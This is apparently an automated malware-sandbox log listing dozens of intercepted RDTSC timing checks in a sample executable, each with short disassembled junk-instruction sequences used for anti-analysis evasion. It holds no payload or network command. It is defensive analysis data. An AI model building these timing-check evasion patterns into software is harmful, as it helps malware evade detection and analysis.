Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9FBC3 second address: F9FBD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FF34080AB06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F9FBD3 second address: F9FBD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA27E6 second address: FA2806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA233D second address: FA2360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF340810308h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA2360 second address: FA236E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007FF34080AB06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA682B second address: FA684A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d pop edi 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA684A second address: FA6850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA6850 second address: FA6884 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF3408102F6h 0x00000008 jmp 00007FF340810309h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FF3408102FEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F08384 second address: F0838C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA5F99 second address: FA5F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA6108 second address: FA615B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF34080AB1Dh 0x0000000a jmp 00007FF34080AB17h 0x0000000f jmp 00007FF34080AB11h 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 js 00007FF34080AB06h 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF34080AB13h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA62BC second address: FA62C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FA62C0 second address: FA62DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Bh 0x00000007 jng 00007FF34080AB06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jl 00007FF34080AB0Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FABC65 second address: FABC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FABC6B second address: FABC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FABC6F second address: FABC91 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF3408102F6h 0x00000008 jmp 00007FF340810308h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FABC91 second address: FABC9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF34080AB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FABC9C second address: FABD05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF3408102F6h 0x0000000a jmp 00007FF3408102FAh 0x0000000f popad 0x00000010 jnc 00007FF34081030Fh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jp 00007FF3408102F6h 0x00000021 jmp 00007FF340810309h 0x00000026 jmp 00007FF3408102FEh 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FABECD second address: FABED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF34080AB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FAC04A second address: FAC04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FAC04F second address: FAC057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FAC2DC second address: FAC2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FAC2E0 second address: FAC2E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FAC2E4 second address: FAC2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FAC2EF second address: FAC2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FAC5AB second address: FAC5AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB1243 second address: FB124D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF34080AB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB124D second address: FB125D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FF3408102F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB06B1 second address: FB06BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB06BA second address: FB06C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB06C0 second address: FB06C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB07E4 second address: FB07E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB07E8 second address: FB080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB18h 0x00000007 jl 00007FF34080AB06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB080F second address: FB0849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810306h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF340810300h 0x00000012 pop eax 0x00000013 popad 0x00000014 js 00007FF340810318h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB09BE second address: FB09CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007FF34080AB06h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB0B1A second address: FB0B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB97B6 second address: FB97D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b jc 00007FF34080AB06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB776E second address: FB7779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF3408102F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB7779 second address: FB77B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF34080AB06h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007FF34080AB35h 0x00000015 jnc 00007FF34080AB0Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF34080AB11h 0x00000022 push edx 0x00000023 pop edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB78D7 second address: FB78E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3408102FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB78E8 second address: FB78EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB7A65 second address: FB7A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FF3408102FEh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF340810304h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB7A90 second address: FB7A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB7A94 second address: FB7AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810304h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jne 00007FF3408102FCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB7DBC second address: FB7DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB7DD4 second address: FB7DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB86D5 second address: FB86D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB8A06 second address: FB8A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB8A0C second address: FB8A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FF34080AB08h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB8A1C second address: FB8A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF340810301h 0x0000000c jmp 00007FF3408102FFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB91E6 second address: FB91EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB91EC second address: FB91F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB91F2 second address: FB9205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF34080AB0Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB9205 second address: FB9215 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF3408102F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB94E9 second address: FB9505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF34080AB14h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB9505 second address: FB9512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FB9512 second address: FB952B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF34080AB14h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC2534 second address: FC255C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF340810304h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 je 00007FF3408102F6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F1411E second address: F14124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC173A second address: FC173E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC173E second address: FC1749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC1BCF second address: FC1BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC1BDE second address: FC1BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC1EF4 second address: FC1F13 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF3408102FAh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF3408102FBh 0x0000000f jnp 00007FF3408102F6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC20B9 second address: FC20BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC20BD second address: FC20C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC20C1 second address: FC20EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FF34080AB06h 0x00000016 jmp 00007FF34080AB18h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC20EF second address: FC20F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC868E second address: FC8692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC8C77 second address: FC8C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF3408102FCh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC8DD0 second address: FC8DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC8DD4 second address: FC8DF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810306h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC90B3 second address: FC90B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC9BF0 second address: FC9BFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC9BFA second address: FC9C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FF34080AB0Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FC9C0C second address: FC9C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FD15C8 second address: FD15D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FD15D3 second address: FD15DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FD173A second address: FD1744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF34080AB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FD1744 second address: FD1748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FD1748 second address: FD1754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FDD911 second address: FDD915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FDDA7D second address: FDDA9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF34080AB0Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FDDA9F second address: FDDAAB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF3408102F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FDDAAB second address: FDDAB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF34080AB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF9FEB second address: FFA006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF340810303h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FFA006 second address: FFA019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jng 00007FF34080AB06h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FFA019 second address: FFA03A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007FF3408102F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF340810301h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF8C6C second address: FF8C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF8DB0 second address: FF8DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF8DB6 second address: FF8DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF8DBA second address: FF8DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810304h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: FF9249 second address: FF9286 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FF34080AB0Eh 0x0000000f jmp 00007FF34080AB15h 0x00000014 popad 0x00000015 push edx 0x00000016 jmp 00007FF34080AB0Bh 0x0000001b push edi 0x0000001c pop edi 0x0000001d pop edx 0x0000001e rdtsc
